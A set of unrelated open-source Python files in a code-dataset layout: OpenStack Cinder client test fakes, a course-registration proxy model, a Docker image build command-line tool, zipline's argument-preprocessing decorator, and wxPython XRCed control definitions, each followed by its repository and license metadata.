{'transfer': _stub_transfer(transfer1, base_uri, tenant_id)})
#
# Services
#
def get_os_services(self, **kw):
host = kw.get('host', None)
binary = kw.get('binary', None)
services = [
{
'binary': 'cinder-volume',
'host': 'host1',
'zone': 'cinder',
'status': 'enabled',
'state': 'up',
'updated_at': datetime(2012, 10, 29, 13, 42, 2)
},
{
'binary': 'cinder-volume',
'host': 'host2',
'zone': 'cinder',
'status': 'disabled',
'state': 'down',
'updated_at': datetime(2012, 9, 18, 8, 3, 38)
},
{
'binary': 'cinder-scheduler',
'host': 'host2',
'zone': 'cinder',
'status': 'disabled',
'state': 'down',
'updated_at': datetime(2012, 9, 18, 8, 3, 38)
},
]
if host:
            services = [i for i in services if i['host'] == host]
        if binary:
            services = [i for i in services if i['binary'] == binary]
return (200, {}, {'services': services})
def put_os_services_enable(self, body, **kw):
return (200, {}, {'host': body['host'], 'binary': body['binary'],
'status': 'disabled'})
def put_os_services_disable(self, body, **kw):
return (200, {}, {'host': body['host'], 'binary': body['binary'],
'status': 'enabled'})
def get_os_availability_zone(self, **kw):
return (200, {}, {
"availabilityZoneInfo": [
{
"zoneName": "zone-1",
"zoneState": {"available": True},
"hosts": None,
},
{
"zoneName": "zone-2",
"zoneState": {"available": False},
"hosts": None,
},
]
})
def get_os_availability_zone_detail(self, **kw):
return (200, {}, {
"availabilityZoneInfo": [
{
"zoneName": "zone-1",
"zoneState": {"available": True},
"hosts": {
"fake_host-1": {
"cinder-volume": {
"active": True,
"available": True,
"updated_at":
datetime(2012, 12, 26, 14, 45, 25, 0)
}
}
}
},
{
"zoneName": "internal",
"zoneState": {"available": True},
"hosts": {
"fake_host-1": {
"cinder-sched": {
"active": True,
"available": True,
"updated_at":
datetime(2012, 12, 26, 14, 45, 24, 0)
}
}
}
},
{
"zoneName": "zone-2",
"zoneState": {"available": False},
"hosts": None,
},
]
})
|
citrix-openstack-build/python-cinderclient
|
cinderclient/tests/v2/fakes.py
|
Python
|
apache-2.0
| 24,282 | 0.000124 |
from registrator.models.registration_entry import RegistrationEntry
from uni_info.models import Section
class RegistrationProxy(RegistrationEntry):
"""
    Proxy class that handles actually performing the registration of a
    :model:`registrator.RegistrationEntry` in a registration system
"""
# I guess functions for registration in Concordia's system would go here?
def add_schedule_item(self, schedule_item):
section_list = schedule_item.sections
sections = {}
sections['MainSec'] = section_list[0]
for i in range(1, len(section_list)):
sections['RelSec' + str(i)] = section_list[i]
sections['course_letters'] = section_list[0].course.course_letters
sections['course_numbers'] = section_list[0].course.course_numbers
sections['session'] = section_list[0].semester_year
sections['CatNum'] = '12345'
sections['Start'] = section_list[0].start_time
sections['Finish'] = section_list[0].end_time
sections['Campus'] = 'S'
sections['Title'] = section_list[0].course.name
return sections
class Meta:
proxy = True
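# Illustrative usage sketch (not part of the upstream module): given a
# hypothetical `schedule_item` whose `.sections` list holds Section instances,
#   fields = RegistrationProxy().add_schedule_item(schedule_item)
# returns a dict with 'MainSec', optional 'RelSec1'..'RelSecN', and course
# metadata keys such as 'course_letters', 'course_numbers' and 'session'.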
|
squarebracket/star
|
registrator/models/registration_proxy.py
|
Python
|
gpl-2.0
| 1,141 | 0.001753 |
import argparse
import docker
import logging
import os
import docket
logger = logging.getLogger('docket')
logging.basicConfig()
parser = argparse.ArgumentParser(description='')
parser.add_argument('-t', '--tag', dest='tag', help='tag for final image')
parser.add_argument('--verbose', dest='verbose', action='store_true', help='verbose output', default=False)
parser.add_argument('--no-cache', dest='no_cache', action='store_true', help='Do not use cache when building the image', default=False)
parser.add_argument('buildpath', nargs='*')
args = parser.parse_args()
if args.verbose:
logger.setLevel(logging.DEBUG)
cert_path = os.environ.get('DOCKER_CERT_PATH', '')
# The env var is a string such as '1'/'0'; convert it so TLSConfig gets a real boolean.
tls_verify = os.environ.get('DOCKER_TLS_VERIFY', '0') == '1'
base_url = os.environ.get('DOCKER_HOST', 'tcp://127.0.0.1:2375')
base_url = base_url.replace('tcp:', 'https:')
tls_config = None
if cert_path:
tls_config = docker.tls.TLSConfig(verify=tls_verify,
client_cert=(os.path.join(cert_path, 'cert.pem'), os.path.join(cert_path, 'key.pem')),
ca_cert=os.path.join(cert_path, 'ca.pem')
)
client = docker.Client(base_url=base_url, version='1.15', timeout=10, tls=tls_config)
tag = args.tag or None
buildpath = args.buildpath[0]
def main():
docket.build(client=client, tag=tag, buildpath=buildpath, no_cache=args.no_cache)
exit()
if __name__ == '__main__':
main()
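# Illustrative invocation (assumes the package's console script is installed
# as `docket` and a Docker daemon is reachable; the image tag and build path
# are examples):
#   DOCKER_HOST=tcp://127.0.0.1:2375 docket --tag myimage:latest ./build-dir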
|
clarete/docket
|
docket/command_line.py
|
Python
|
mit
| 1,369 | 0.005844 |
"""
Utilities for validating inputs to user-facing API functions.
"""
from textwrap import dedent
from types import CodeType
from functools import wraps
from inspect import getargspec
from uuid import uuid4
from toolz.curried.operator import getitem
from six import viewkeys, exec_, PY3
_code_argorder = (
('co_argcount', 'co_kwonlyargcount') if PY3 else ('co_argcount',)
) + (
'co_nlocals',
'co_stacksize',
'co_flags',
'co_code',
'co_consts',
'co_names',
'co_varnames',
'co_filename',
'co_name',
'co_firstlineno',
'co_lnotab',
'co_freevars',
'co_cellvars',
)
NO_DEFAULT = object()
def preprocess(*_unused, **processors):
"""
Decorator that applies pre-processors to the arguments of a function before
calling the function.
Parameters
----------
**processors : dict
Map from argument name -> processor function.
A processor function takes three arguments: (func, argname, argvalue).
    `func` is the function for which we're processing args.
`argname` is the name of the argument we're processing.
`argvalue` is the value of the argument we're processing.
Examples
--------
>>> def _ensure_tuple(func, argname, arg):
... if isinstance(arg, tuple):
    ...         return arg
... try:
... return tuple(arg)
... except TypeError:
... raise TypeError(
... "%s() expected argument '%s' to"
... " be iterable, but got %s instead." % (
... func.__name__, argname, arg,
... )
... )
...
>>> @preprocess(arg=_ensure_tuple)
... def foo(arg):
... return arg
...
>>> foo([1, 2, 3])
(1, 2, 3)
>>> foo("a")
('a',)
>>> foo(2)
Traceback (most recent call last):
...
TypeError: foo() expected argument 'arg' to be iterable, but got 2 instead.
"""
if _unused:
raise TypeError("preprocess() doesn't accept positional arguments")
def _decorator(f):
args, varargs, varkw, defaults = argspec = getargspec(f)
if defaults is None:
defaults = ()
no_defaults = (NO_DEFAULT,) * (len(args) - len(defaults))
args_defaults = list(zip(args, no_defaults + defaults))
if varargs:
args_defaults.append((varargs, NO_DEFAULT))
if varkw:
args_defaults.append((varkw, NO_DEFAULT))
argset = set(args) | {varargs, varkw} - {None}
# Arguments can be declared as tuples in Python 2.
if not all(isinstance(arg, str) for arg in args):
raise TypeError(
"Can't validate functions using tuple unpacking: %s" %
(argspec,)
)
# Ensure that all processors map to valid names.
bad_names = viewkeys(processors) - argset
if bad_names:
raise TypeError(
"Got processors for unknown arguments: %s." % bad_names
)
return _build_preprocessed_function(
f, processors, args_defaults, varargs, varkw,
)
return _decorator
def call(f):
"""
Wrap a function in a processor that calls `f` on the argument before
passing it along.
Useful for creating simple arguments to the `@preprocess` decorator.
Parameters
----------
f : function
Function accepting a single argument and returning a replacement.
Examples
--------
>>> @preprocess(x=call(lambda x: x + 1))
... def foo(x):
... return x
...
>>> foo(1)
2
"""
@wraps(f)
def processor(func, argname, arg):
return f(arg)
return processor
def _build_preprocessed_function(func,
processors,
args_defaults,
varargs,
varkw):
"""
Build a preprocessed function with the same signature as `func`.
Uses `exec` internally to build a function that actually has the same
    signature as `func`.
"""
format_kwargs = {'func_name': func.__name__}
def mangle(name):
return 'a' + uuid4().hex + name
format_kwargs['mangled_func'] = mangled_funcname = mangle(func.__name__)
def make_processor_assignment(arg, processor_name):
template = "{arg} = {processor}({func}, '{arg}', {arg})"
return template.format(
arg=arg,
processor=processor_name,
func=mangled_funcname,
)
exec_globals = {mangled_funcname: func, 'wraps': wraps}
defaults_seen = 0
default_name_template = 'a' + uuid4().hex + '_%d'
signature = []
call_args = []
assignments = []
star_map = {
varargs: '*',
varkw: '**',
}
def name_as_arg(arg):
return star_map.get(arg, '') + arg
for arg, default in args_defaults:
if default is NO_DEFAULT:
signature.append(name_as_arg(arg))
else:
default_name = default_name_template % defaults_seen
exec_globals[default_name] = default
signature.append('='.join([name_as_arg(arg), default_name]))
defaults_seen += 1
if arg in processors:
procname = mangle('_processor_' + arg)
exec_globals[procname] = processors[arg]
assignments.append(make_processor_assignment(arg, procname))
call_args.append(name_as_arg(arg))
exec_str = dedent(
"""\
@wraps({wrapped_funcname})
def {func_name}({signature}):
{assignments}
return {wrapped_funcname}({call_args})
"""
).format(
func_name=func.__name__,
signature=', '.join(signature),
assignments='\n '.join(assignments),
wrapped_funcname=mangled_funcname,
call_args=', '.join(call_args),
)
compiled = compile(
exec_str,
func.__code__.co_filename,
mode='exec',
)
exec_locals = {}
exec_(compiled, exec_globals, exec_locals)
new_func = exec_locals[func.__name__]
code = new_func.__code__
args = {
attr: getattr(code, attr)
for attr in dir(code)
if attr.startswith('co_')
}
# Copy the firstlineno out of the underlying function so that exceptions
# get raised with the correct traceback.
# This also makes dynamic source inspection (like IPython `??` operator)
# work as intended.
try:
# Try to get the pycode object from the underlying function.
original_code = func.__code__
except AttributeError:
try:
# The underlying callable was not a function, try to grab the
# `__func__.__code__` which exists on method objects.
original_code = func.__func__.__code__
except AttributeError:
# The underlying callable does not have a `__code__`. There is
# nothing for us to correct.
return new_func
args['co_firstlineno'] = original_code.co_firstlineno
new_func.__code__ = CodeType(*map(getitem(args), _code_argorder))
return new_func
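# Illustrative sketch (not part of the upstream module) of the source that
# _build_preprocessed_function() generates for
#     @preprocess(x=call(lambda x: x + 1))
#     def foo(x, y=3):
#         ...
# with the uuid-mangled names shortened to <m> for readability:
#
#     @wraps(<m>foo)
#     def foo(x, y=<m>_0):
#         x = <m>_processor_x(<m>foo, 'x', x)
#         return <m>foo(x, y)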
|
bartosh/zipline
|
zipline/utils/preprocess.py
|
Python
|
apache-2.0
| 7,205 | 0 |
# Name: controls.py
# Purpose: Control components
# Author: Roman Rolinsky <rolinsky@femagsoft.com>
# Created: 31.05.2007
# RCS-ID: $Id: core.py 47823 2007-07-29 19:24:35Z ROL $
from wx.tools.XRCed import component, images, attribute, params
from wx.tools.XRCed.globals import TRACE
import _bitmaps as bitmaps
TRACE('*** creating control components')
# Set panel images
component.Manager.panelImages['Controls'] = images.ToolPanel_Controls.GetImage()
### wxStaticText
c = component.Component('wxStaticText', ['control','tool'],
['pos', 'size', 'label', 'wrap'], defaults={'label': 'LABEL'},
image=images.TreeStaticText.GetImage())
c.addStyles('wxALIGN_LEFT', 'wxALIGN_RIGHT', 'wxALIGN_CENTRE', 'wxST_NO_AUTORESIZE')
component.Manager.register(c)
component.Manager.setMenu(c, 'control', 'label', 'wxStaticText', 10)
component.Manager.setTool(c, 'Controls', pos=(0,0))
### wxStaticLine
c = component.Component('wxStaticLine', ['control','tool'],
['pos', 'size'], image=images.TreeStaticLine.GetImage())
c.addStyles('wxLI_HORIZONTAL', 'wxLI_VERTICAL')
component.Manager.register(c)
component.Manager.setMenu(c, 'control', 'line', 'wxStaticLine', 20)
component.Manager.setTool(c, 'Controls', pos=(0,3))
### wxStaticBitmap
c = component.Component('wxStaticBitmap', ['control','tool'],
['pos', 'size', 'bitmap'],
image=images.TreeStaticBitmap.GetImage())
c.setSpecial('bitmap', attribute.BitmapAttribute)
component.Manager.register(c)
component.Manager.setMenu(c, 'control', 'bitmap', 'wxStaticLine', 30)
component.Manager.setTool(c, 'Controls', pos=(1,0))
### wxTextCtrl
c = component.Component('wxTextCtrl', ['control','tool'],
['pos', 'size', 'value'],
image=images.TreeTextCtrl.GetImage())
c.addStyles('wxTE_NO_VSCROLL',
'wxTE_AUTO_SCROLL',
'wxTE_PROCESS_ENTER',
'wxTE_PROCESS_TAB',
'wxTE_MULTILINE',
'wxTE_PASSWORD',
'wxTE_READONLY',
'wxHSCROLL',
'wxTE_RICH',
'wxTE_RICH2',
'wxTE_AUTO_URL',
'wxTE_NOHIDESEL',
'wxTE_LEFT',
'wxTE_CENTRE',
'wxTE_RIGHT',
'wxTE_DONTWRAP',
'wxTE_LINEWRAP',
'wxTE_CHARWRAP',
'wxTE_WORDWRAP')
c.setParamClass('value', params.ParamMultilineText)
c.addEvents('EVT_TEXT', 'EVT_TEXT_ENTER', 'EVT_TEXT_URL', 'EVT_TEXT_MAXLEN')
component.Manager.register(c)
component.Manager.setMenu(c, 'control', 'text ctrl', 'wxTextCtrl', 40)
component.Manager.setTool(c, 'Controls', pos=(0,2))
### wxChoice
c = component.Component('wxChoice', ['control','tool'],
['pos', 'size', 'content', 'selection'],
image=images.TreeChoice.GetImage())
c.addStyles('wxCB_SORT')
c.setSpecial('content', attribute.ContentAttribute)
c.addEvents('EVT_CHOICE')
component.Manager.register(c)
component.Manager.setMenu(c, 'control', 'choice', 'wxChoice', 50)
component.Manager.setTool(c, 'Controls', pos=(3,2))
### wxSlider
c = component.Component('wxSlider', ['control','tool'],
['pos', 'size', 'value', 'min', 'max',
'tickfreq', 'pagesize', 'linesize', 'thumb', 'tick',
'selmin', 'selmax'],
image=images.TreeSlider.GetImage())
c.addStyles('wxSL_HORIZONTAL', 'wxSL_VERTICAL', 'wxSL_AUTOTICKS', 'wxSL_LABELS',
'wxSL_LEFT', 'wxSL_RIGHT', 'wxSL_TOP', 'wxSL_BOTTOM',
'wxSL_BOTH', 'wxSL_SELRANGE', 'wxSL_INVERSE')
component.Manager.register(c)
c.setParamClass('value', params.ParamInt)
c.setParamClass('tickfreq', params.ParamIntNN)
c.setParamClass('pagesize', params.ParamIntNN)
c.setParamClass('linesize', params.ParamIntNN)
c.setParamClass('thumb', params.ParamUnit)
c.setParamClass('tick', params.ParamInt)
c.setParamClass('selmin', params.ParamInt)
c.setParamClass('selmax', params.ParamInt)
c.addEvents('EVT_SCROLL', 'EVT_SCROLL_TOP', 'EVT_SCROLL_BOTTOM',
'EVT_SCROLL_LINEUP', 'EVT_SCROLL_LINEDOWN', 'EVT_SCROLL_PAGEUP',
'EVT_SCROLL_PAGEDOWN', 'EVT_SCROLL_THUMBTRACK', 'EVT_SCROLL_THUMBRELEASE',
'EVT_SCROLL_CHANGED', 'EVT_SCROLL', 'EVT_SCROLL_TOP',
'EVT_SCROLL_BOTTOM', 'EVT_SCROLL_LINEUP',
'EVT_SCROLL_LINEDOWN', 'EVT_SCROLL_PAGEUP',
'EVT_SCROLL_PAGEDOWN', 'EVT_SCROLL_THUMBTRACK',
'EVT_SCROLL_THUMBRELEASE', 'EVT_SCROLL_CHANGED')
component.Manager.setMenu(c, 'control', 'slider', 'wxSlider', 60)
component.Manager.setTool(c, 'Controls', pos=(2,3))
### wxGauge
c = component.Component('wxGauge', ['control','tool'],
['pos', 'size', 'range', 'value', 'shadow', 'bezel'],
image=images.TreeGauge.GetImage())
c.addStyles('wxGA_HORIZONTAL', 'wxGA_VERTICAL', 'wxGA_PROGRESSBAR', 'wxGA_SMOOTH')
c.setParamClass('range', params.ParamIntNN)
c.setParamClass('value', params.ParamIntNN)
c.setParamClass('shadow', params.ParamUnit)
c.setParamClass('bezel', params.ParamUnit)
component.Manager.register(c)
component.Manager.setMenu(c, 'control', 'gauge', 'wxGauge', 70)
component.Manager.setTool(c, 'Controls', pos=(1,3))
### wxSpinCtrl
c = component.Component('wxSpinCtrl', ['control','tool'],
['pos', 'size', 'value', 'min', 'max'],
image=images.TreeSpinCtrl.GetImage())
c.addStyles('wxSP_HORIZONTAL', 'wxSP_VERTICAL', 'wxSP_ARROW_KEYS', 'wxSP_WRAP')
c.setParamClass('value', params.ParamInt)
c.addEvents('EVT_SPINCTRL')
component.Manager.register(c)
component.Manager.setMenu(c, 'control', 'spin ctrl', 'wxSpinCtrl', 80)
component.Manager.setTool(c, 'Controls', pos=(1,2))
### wxScrollBar
c = component.Component('wxScrollBar', ['control'],
['pos', 'size', 'value', 'thumbsize', 'range', 'pagesize'],
image=images.TreeScrollBar.GetImage())
c.addStyles('wxSB_HORIZONTAL', 'wxSB_VERTICAL')
c.setParamClass('range', params.ParamIntNN)
c.setParamClass('value', params.ParamIntNN)
c.setParamClass('thumbsize', params.ParamUnit)
c.setParamClass('pagesize', params.ParamUnit)
c.addEvents('EVT_SCROLL', 'EVT_SCROLL_TOP', 'EVT_SCROLL_BOTTOM',
'EVT_SCROLL_LINEUP', 'EVT_SCROLL_LINEDOWN', 'EVT_SCROLL_PAGEUP',
'EVT_SCROLL_PAGEDOWN', 'EVT_SCROLL_THUMBTRACK', 'EVT_SCROLL_THUMBRELEASE',
'EVT_SCROLL_CHANGED', 'EVT_SCROLL', 'EVT_SCROLL_TOP',
'EVT_SCROLL_BOTTOM', 'EVT_SCROLL_LINEUP',
'EVT_SCROLL_LINEDOWN', 'EVT_SCROLL_PAGEUP',
'EVT_SCROLL_PAGEDOWN', 'EVT_SCROLL_THUMBTRACK',
'EVT_SCROLL_THUMBRELEASE', 'EVT_SCROLL_CHANGED')
component.Manager.register(c)
component.Manager.setMenu(c, 'control', 'scroll bar', 'wxScrollBar', 90)
component.Manager.setTool(c, 'Controls', pos=(3,3))
### wxListCtrl
c = component.Component('wxListCtrl', ['control','tool'], ['pos', 'size'],
image=images.TreeListCtrl.GetImage())
c.addStyles('wxLC_LIST', 'wxLC_REPORT', 'wxLC_ICON', 'wxLC_SMALL_ICON',
'wxLC_ALIGN_TOP', 'wxLC_ALIGN_LEFT', 'wxLC_AUTOARRANGE',
'wxLC_USER_TEXT', 'wxLC_EDIT_LABELS', 'wxLC_NO_HEADER',
'wxLC_SINGLE_SEL', 'wxLC_SORT_ASCENDING', 'wxLC_SORT_DESCENDING',
'wxLC_VIRTUAL', 'wxLC_HRULES', 'wxLC_VRULES', 'wxLC_NO_SORT_HEADER')
c.addEvents('EVT_LIST_BEGIN_DRAG',
'EVT_LIST_BEGIN_RDRAG',
'EVT_LIST_BEGIN_LABEL_EDIT',
'EVT_LIST_END_LABEL_EDIT',
'EVT_LIST_DELETE_ITEM',
'EVT_LIST_DELETE_ALL_ITEMS',
'EVT_LIST_ITEM_SELECTED',
'EVT_LIST_ITEM_DESELECTED',
'EVT_LIST_KEY_DOWN',
'EVT_LIST_INSERT_ITEM',
'EVT_LIST_COL_CLICK',
'EVT_LIST_ITEM_RIGHT_CLICK',
'EVT_LIST_ITEM_MIDDLE_CLICK',
'EVT_LIST_ITEM_ACTIVATED',
'EVT_LIST_CACHE_HINT',
'EVT_LIST_COL_RIGHT_CLICK',
'EVT_LIST_COL_BEGIN_DRAG',
'EVT_LIST_COL_DRAGGING',
'EVT_LIST_COL_END_DRAG',
'EVT_LIST_ITEM_FOCUSED')
component.Manager.register(c)
component.Manager.setMenu(c, 'control', 'list ctrl', 'wxListCtrl', 100)
component.Manager.setTool(c, 'Panels', pos=(0,1))
### wxTreeCtrl
c = component.Component('wxTreeCtrl', ['control','tool'], ['pos', 'size'],
image=images.TreeTreeCtrl.GetImage())
c.addStyles('wxTR_EDIT_LABELS',
'wxTR_NO_BUTTONS',
'wxTR_HAS_BUTTONS',
'wxTR_TWIST_BUTTONS',
'wxTR_NO_LINES',
'wxTR_FULL_ROW_HIGHLIGHT',
'wxTR_LINES_AT_ROOT',
'wxTR_HIDE_ROOT',
'wxTR_ROW_LINES',
'wxTR_HAS_VARIABLE_ROW_HEIGHT',
'wxTR_SINGLE',
'wxTR_MULTIPLE',
'wxTR_EXTENDED',
'wxTR_DEFAULT_STYLE')
c.addEvents('EVT_TREE_BEGIN_DRAG',
'EVT_TREE_BEGIN_RDRAG',
'EVT_TREE_BEGIN_LABEL_EDIT',
'EVT_TREE_END_LABEL_EDIT',
'EVT_TREE_DELETE_ITEM',
'EVT_TREE_GET_INFO',
'EVT_TREE_SET_INFO',
'EVT_TREE_ITEM_EXPANDED',
'EVT_TREE_ITEM_EXPANDING',
'EVT_TREE_ITEM_COLLAPSED',
'EVT_TREE_ITEM_COLLAPSING',
'EVT_TREE_SEL_CHANGED',
'EVT_TREE_SEL_CHANGING',
'EVT_TREE_KEY_DOWN',
'EVT_TREE_ITEM_ACTIVATED',
'EVT_TREE_ITEM_RIGHT_CLICK',
'EVT_TREE_ITEM_MIDDLE_CLICK',
'EVT_TREE_END_DRAG',
'EVT_TREE_STATE_IMAGE_CLICK',
'EVT_TREE_ITEM_GETTOOLTIP',
'EVT_TREE_ITEM_MENU')
component.Manager.register(c)
component.Manager.setMenu(c, 'control', 'tree ctrl', 'wxTreeCtrl', 110)
component.Manager.setTool(c, 'Panels', pos=(0,2))
### wxHtmlWindow
c = component.Component('wxHtmlWindow', ['control'],
['pos', 'size', 'borders', 'url', 'htmlcode'])
c.addStyles('wxHW_SCROLLBAR_NEVER', 'wxHW_SCROLLBAR_AUTO', 'wxHW_NO_SELECTION')
c.setParamClass('url', params.ParamLongText)
c.setParamClass('htmlcode', params.ParamMultilineText)
c.addEvents('EVT_HTML_CELL_CLICKED', 'EVT_HTML_CELL_HOVER',
'EVT_HTML_LINK_CLICKED')
component.Manager.register(c)
component.Manager.setMenu(c, 'control', 'HTML window', 'wxHtmlWindow', 120)
### wxCalendarCtrl
c = component.Component('wxCalendarCtrl', ['control', 'tool'], ['pos', 'size'])
c.addStyles('wxCAL_SUNDAY_FIRST', 'wxCAL_MONDAY_FIRST', 'wxCAL_SHOW_HOLIDAYS',
'wxCAL_NO_YEAR_CHANGE', 'wxCAL_NO_MONTH_CHANGE',
'wxCAL_SEQUENTIAL_MONTH_SELECTION', 'wxCAL_SHOW_SURROUNDING_WEEKS')
c.addEvents('EVT_CALENDAR_SEL_CHANGED', 'EVT_CALENDAR_DAY_CHANGED',
'EVT_CALENDAR_MONTH_CHANGED', 'EVT_CALENDAR_YEAR_CHANGED',
'EVT_CALENDAR_DOUBLECLICKED', 'EVT_CALENDAR_WEEKDAY_CLICKED')
component.Manager.register(c)
component.Manager.setMenu(c, 'control', 'calendar ctrl', 'wxCalendarCtrl', 130)
### wxGenericDirCtrl
c = component.Component('wxGenericDirCtrl', ['control'],
['pos', 'size', 'defaultfolder', 'filter', 'defaultfilter'])
c.addStyles('wxDIRCTRL_DIR_ONLY', 'wxDIRCTRL_3D_INTERNAL', 'wxDIRCTRL_SELECT_FIRST',
'wxDIRCTRL_SHOW_FILTERS', 'wxDIRCTRL_EDIT_LABELS')
component.Manager.register(c)
component.Manager.setMenu(c, 'control', 'generic dir ctrl', 'wxGenericDirCtrl', 160)
### wxFilePickerCtrl
c = component.Component('wxFilePickerCtrl', ['control'],
['pos', 'size', 'value', 'message', 'wildcard'])
c.addStyles('wxFLP_OPEN', 'wxFLP_SAVE', 'wxFLP_OVERWRITE_PROMPT',
'wxFLP_FILE_MUST_EXIST', 'wxFLP_CHANGE_DIR',
'wxFLP_DEFAULT_STYLE')
component.Manager.register(c)
component.Manager.setMenu(c, 'control', 'file picker ctrl', 'wxFilePickerCtrl', 170)
component.Manager.setTool(c, 'Controls', pos=(4,2))
### wxDatePickerCtrl
c = component.Component('wxDatePickerCtrl', ['control'], ['pos', 'size', 'borders'])
c.addStyles('wxDP_DEFAULT', 'wxDP_SPIN', 'wxDP_DROPDOWN',
'wxDP_ALLOWNONE', 'wxDP_SHOWCENTURY')
component.Manager.register(c)
component.Manager.setMenu(c, 'control', 'date picker ctrl', 'wxDateCtrl', 180)
### wxGrid
c = component.Component('wxGrid', ['control'], ['pos', 'size'])
c.addEvents('EVT_GRID_CELL_LEFT_CLICK',
'EVT_GRID_CELL_RIGHT_CLICK',
'EVT_GRID_CELL_LEFT_DCLICK',
'EVT_GRID_CELL_RIGHT_DCLICK',
'EVT_GRID_LABEL_LEFT_CLICK',
'EVT_GRID_LABEL_RIGHT_CLICK',
'EVT_GRID_LABEL_LEFT_DCLICK',
'EVT_GRID_LABEL_RIGHT_DCLICK',
'EVT_GRID_ROW_SIZE',
'EVT_GRID_COL_SIZE',
'EVT_GRID_RANGE_SELECT',
'EVT_GRID_CELL_CHANGE',
'EVT_GRID_SELECT_CELL',
'EVT_GRID_EDITOR_SHOWN',
'EVT_GRID_EDITOR_HIDDEN',
'EVT_GRID_EDITOR_CREATED',
'EVT_GRID_CELL_BEGIN_DRAG')
component.Manager.register(c)
component.Manager.setMenu(c, 'control', 'grid', 'wxGrid', 190)
component.Manager.setTool(c, 'Panels', pos=(2,1), span=(1,2))
### wxHyperlinkCtrl
c = component.Component('wxHyperlinkCtrl', ['control','tool'],
['pos', 'size', 'label', 'url'],
params={'url': params.ParamText},
defaults={'url': 'http://'})
c.addStyles('wxHL_CONTEXTMENU', 'wxHL_ALIGN_LEFT', 'wxHL_ALIGN_RIGHT',
'wxHL_ALIGN_CENTRE', 'wxHL_DEFAULT_STYLE')
component.Manager.register(c)
component.Manager.setMenu(c, 'control', 'hyperlink', 'wxHyperlinkCtrl', 200)
component.Manager.setTool(c, 'Controls', pos=(3,0))
################################################################################
# Buttons
### wxButton
c = component.Component('wxButton', ['control', 'tool', 'stdbtn'],
['pos', 'size', 'label', 'default'],
image=images.TreeButton.GetImage())
c.addStyles('wxBU_LEFT', 'wxBU_TOP', 'wxBU_RIGHT', 'wxBU_BOTTOM', 'wxBU_EXACTFIT',
'wxNO_BORDER')
c.setParamClass('default', params.ParamBool)
c.addEvents('EVT_BUTTON')
component.Manager.register(c)
component.Manager.setMenu(c, 'button', 'button', 'wxButton', 10)
component.Manager.setTool(c, 'Controls', pos=(0,1))
### wxBitmapButton
c = component.Component('wxBitmapButton', ['control', 'tool'],
['pos', 'size', 'default',
'bitmap', 'selected', 'focus', 'disabled', 'hover'],
image=images.TreeBitmapButton.GetImage())
c.addStyles('wxBU_AUTODRAW', 'wxBU_LEFT', 'wxBU_RIGHT', 'wxBU_TOP', 'wxBU_BOTTOM',
'wxBU_EXACTFIT')
c.setParamClass('default', params.ParamBool)
c.setSpecial('bitmap', attribute.BitmapAttribute)
c.setSpecial('selected', attribute.BitmapAttribute)
c.setParamClass('selected', params.ParamBitmap)
c.setSpecial('focus', attribute.BitmapAttribute)
c.setParamClass('focus', params.ParamBitmap)
c.setSpecial('disabled', attribute.BitmapAttribute)
c.setParamClass('disabled', params.ParamBitmap)
c.setSpecial('hover', attribute.BitmapAttribute)
c.setParamClass('hover', params.ParamBitmap)
c.addEvents('EVT_BUTTON')
component.Manager.register(c)
component.Manager.setMenu(c, 'button', 'bitmap button', 'wxBitmapButton', 20)
component.Manager.setTool(c, 'Controls', pos=(1,1))
### wxRadioButton
c = component.Component('wxRadioButton', ['control', 'tool'],
['pos', 'size', 'label', 'value'],
image=images.TreeRadioButton.GetImage())
c.addStyles('wxRB_GROUP', 'wxRB_SINGLE')
c.setParamClass('value', params.ParamBool)
c.addEvents('EVT_RADIOBUTTON')
component.Manager.register(c)
component.Manager.setMenu(c, 'button', 'radio button', 'wxRadioButton', 30)
component.Manager.setTool(c, 'Controls', pos=(3,1))
### wxSpinButton
c = component.Component('wxSpinButton', ['control', 'tool'],
['pos', 'size', 'value', 'min', 'max'],
image=images.TreeSpinButton.GetImage())
c.addStyles('wxSP_HORIZONTAL', 'wxSP_VERTICAL', 'wxSP_ARROW_KEYS', 'wxSP_WRAP')
c.addEvents('EVT_SPIN', 'EVT_SPIN_UP', 'EVT_SPIN_DOWN')
component.Manager.register(c)
component.Manager.setMenu(c, 'button', 'spin button', 'wxSpinButton', 40)
component.Manager.setTool(c, 'Controls', pos=(2,0))
### wxToggleButton
c = component.Component('wxToggleButton', ['control', 'tool'],
['pos', 'size', 'label', 'checked'],
image=images.TreeToggleButton.GetImage())
c.addEvents('EVT_TOGGLEBUTTON')
component.Manager.register(c)
component.Manager.setMenu(c, 'button', 'toggle button', 'wxToggleButton', 50)
component.Manager.setTool(c, 'Controls', pos=(2,1))
################################################################################
# Boxes
### wxCheckBox
c = component.Component('wxCheckBox', ['control','tool'],
['pos', 'size', 'label', 'checked'],
image=images.TreeCheckBox.GetImage())
c.addEvents('EVT_CHECKBOX')
component.Manager.register(c)
component.Manager.setMenu(c, 'box', 'check box', 'wxCheckBox', 10)
component.Manager.setTool(c, 'Controls', pos=(4,1))
### wxComboBox
c = component.Component('wxComboBox', ['control','tool'],
['pos', 'size', 'content', 'selection', 'value'],
image=images.TreeComboBox.GetImage())
c.addStyles('wxCB_SINGLE', 'wxCB_DROPDOWN', 'wxCB_READONLY',
'wxCB_SORT', 'wxTE_PROCESS_ENTER')
c.setSpecial('content', attribute.ContentAttribute)
c.addEvents('EVT_COMBOBOX', 'EVT_TEXT', 'EVT_TEXT_ENTER')
component.Manager.register(c)
component.Manager.setMenu(c, 'box', 'combo box', 'wxComboBox', 20)
component.Manager.setTool(c, 'Controls', pos=(2,2))
### wxRadioBox
c = component.Component('wxRadioBox', ['control','tool'],
['pos', 'size', 'label', 'dimension',
                         'content', 'selection'])
c.addStyles('wxRA_SPECIFY_ROWS', 'wxRA_SPECIFY_COLS')
c.setSpecial('content', attribute.ContentAttribute)
c.setParamClass('dimension', params.ParamInt)
c.addEvents('EVT_RADIOBOX')
component.Manager.register(c)
component.Manager.setMenu(c, 'box', 'radio box', 'wxRadioBox', 30)
#component.Manager.setTool(c, 'Panels')
### wxListBox
c = component.Component('wxListBox', ['control','tool'],
['pos', 'size', 'content', 'selection'],
image=images.TreeListBox.GetImage())
c.addStyles('wxLB_SINGLE', 'wxLB_MULTIPLE', 'wxLB_EXTENDED', 'wxLB_HSCROLL',
'wxLB_ALWAYS_SB', 'wxLB_NEEDED_SB', 'wxLB_SORT')
c.setSpecial('content', attribute.ContentAttribute)
c.addEvents('EVT_LISTBOX', 'EVT_LISTBOX_DCLICK')
component.Manager.register(c)
component.Manager.setMenu(c, 'box', 'list box', 'wxListBox', 40)
component.Manager.setTool(c, 'Panels', pos=(0,0))
### wxCheckListBox
